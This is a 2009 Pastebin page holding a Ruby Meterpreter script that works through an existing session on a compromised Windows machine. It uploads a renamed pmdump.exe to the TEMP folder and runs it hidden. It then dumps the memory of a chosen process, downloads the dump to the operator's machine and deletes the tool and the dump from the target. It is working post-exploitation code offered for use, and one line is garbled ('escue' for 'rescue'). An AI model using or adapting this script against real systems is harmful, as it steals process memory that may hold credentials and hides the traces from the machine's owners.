Advertisement
Guest User

redmeat_uk

a guest
Sep 26th, 2009
743
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 4.37 KB | None | 0 0
  1. #!/usr/bin/env ruby
  2.  
  3. # Meterpreter script for dumping target memory for a particular process using Arne Vidstrom's PMDump tool - http://ntsecurity.nu/toolbox/pmdump/
  4.  
  5. # This is a modified version of memdump.rb a script written by Carlos Perez (Dark Operator) - http://www.darkoperator.com/blog/2009/3/10/meterpreter-memory-dump-script.html
  6.  
  7. # modified by: redmeat_uk@hotmail.com
  8. # date: 26/09/2009
  9.  
  10. require 'readline'
  11.  
  12. session = client
  13. # Script Options
  14. @@exec_opts = Rex::Parser::Arguments.new(
  15.                 "-h" => [ false,  "Help menu."                        ],
  16.                 "-t" => [ true,  "Change the timeout default 5min. Specify timeout in seconds"]
  17.                 )
  18. # Expand enviroment %TEMP% variable to get location for storing image
  19. tmp = session.fs.file.expand_path("%TEMP%")
  20. # Create random name for the memory image
  21. imgname = sprintf("%.5d",rand(100000))
  22. # Setting timeout for command variable
  23. timeoutsec = 300
  24.  
  25. #---------------------------------------------------------------------------------------------------------
  26. #Dumping memory image
  27. def memdump(session,tmp,imgname,timeoutsec)
  28.         tmpout = []
  29.         pmexe = File.join(Msf::Config.install_root, "data", "pmdump.exe")
  30.         pmscramble = sprintf("%.5d",rand(100000))
  31.         print_status("Uploading pmdump for dumping memory of a process....")
  32.         begin
  33.                 session.fs.file.upload_file("#{tmp}\\#{pmscramble}.exe","#{pmexe}")
  34.                 print_status("pmdump uploaded as #{tmp}\\#{pmscramble}.exe")
  35. escue::Exception => e
  36.                         print_status("The following Error was encountered: #{e.class} #{e}")
  37.         end
  38.         session.response_timeout=timeoutsec
  39.         print_status("Process list...")
  40.         begin
  41.                 r = session.sys.process.execute("cmd.exe /c #{tmp}\\#{pmscramble}.exe -list", nil, {'Hidden' => 'true','Channelized' => true})
  42.  
  43.                 while(d = r.channel.read)
  44.                         print_status("#{d}")
  45.                 end
  46.                 r.channel.close
  47.                 r.close
  48.                
  49.                         line = Readline::readline('Please enter PID: ')
  50.                         Readline::HISTORY.push(line)
  51.  
  52.                 rescue::Exception => e
  53.                         print_status("The following Error was encountered: #{e.class} #{e}")
  54.                 end
  55.  
  56.                 print_status("Dumping memory for process id #{line}")
  57.                 begin
  58.                 n = session.sys.process.execute("cmd.exe /c #{tmp}\\#{pmscramble}.exe #{line} #{tmp}\\#{imgname}", nil, {'Hidden' => 'true','Channelized' => true})
  59.                 while(d = n.channel.read)
  60.                         tmpout << d
  61.                 end
  62.                 n.channel.close
  63.                 n.close
  64.                        
  65.                 print_status("Finished dumping process's memory")
  66.  
  67.                 rescue::Exception => e
  68.                         print_status("The following Error was encountered: #{e.class} #{e}")
  69.                 end
  70.                 print_status("Downloading memory dump for process id #{line} to /tmp/pmdump-#{imgname}")
  71.  
  72.                  session.fs.file.download_file("/tmp/pmdump-#{imgname}", "#{tmp}\\#{imgname}")
  73.                  print_status("Deleting pmdump.exe from target...")
  74.  
  75.                  session.sys.process.execute("cmd.exe /c del #{tmp}\\#{pmscramble}.exe", nil, {'Hidden' => 'true'})
  76.  
  77.  
  78.                 print_status("pmdump.exe deleted")
  79.                 print_status("Deleting left over files...")
  80.                 session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
  81.                 print_status("process memory dump image on target deleted")
  82. end
  83.  
  84. ################## MAIN ##################
  85. # Parsing of Option
  86. hlp = 0
  87. chk = 0
  88. @@exec_opts.parse(args) { |opt, idx, val|
  89.         case opt
  90.                 when "-t"
  91.                         timeoutsec = val
  92.                 when "-h"
  93.                         hlp = 1
  94.                         print(
  95.                         "Process Memory Dumper Meterpreter Script\n" +
  96.                         @@exec_opts.usage                      
  97.                         )
  98.                         break
  99.                 end
  100.  
  101. }
  102. if (hlp == 0)
  103.         if (chk == 0)
  104.                 print_status("Running Meterpreter Process Memory Dump Script.....")
  105.                 memdump(session,tmp,imgname,timeoutsec)
  106.         end
  107. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement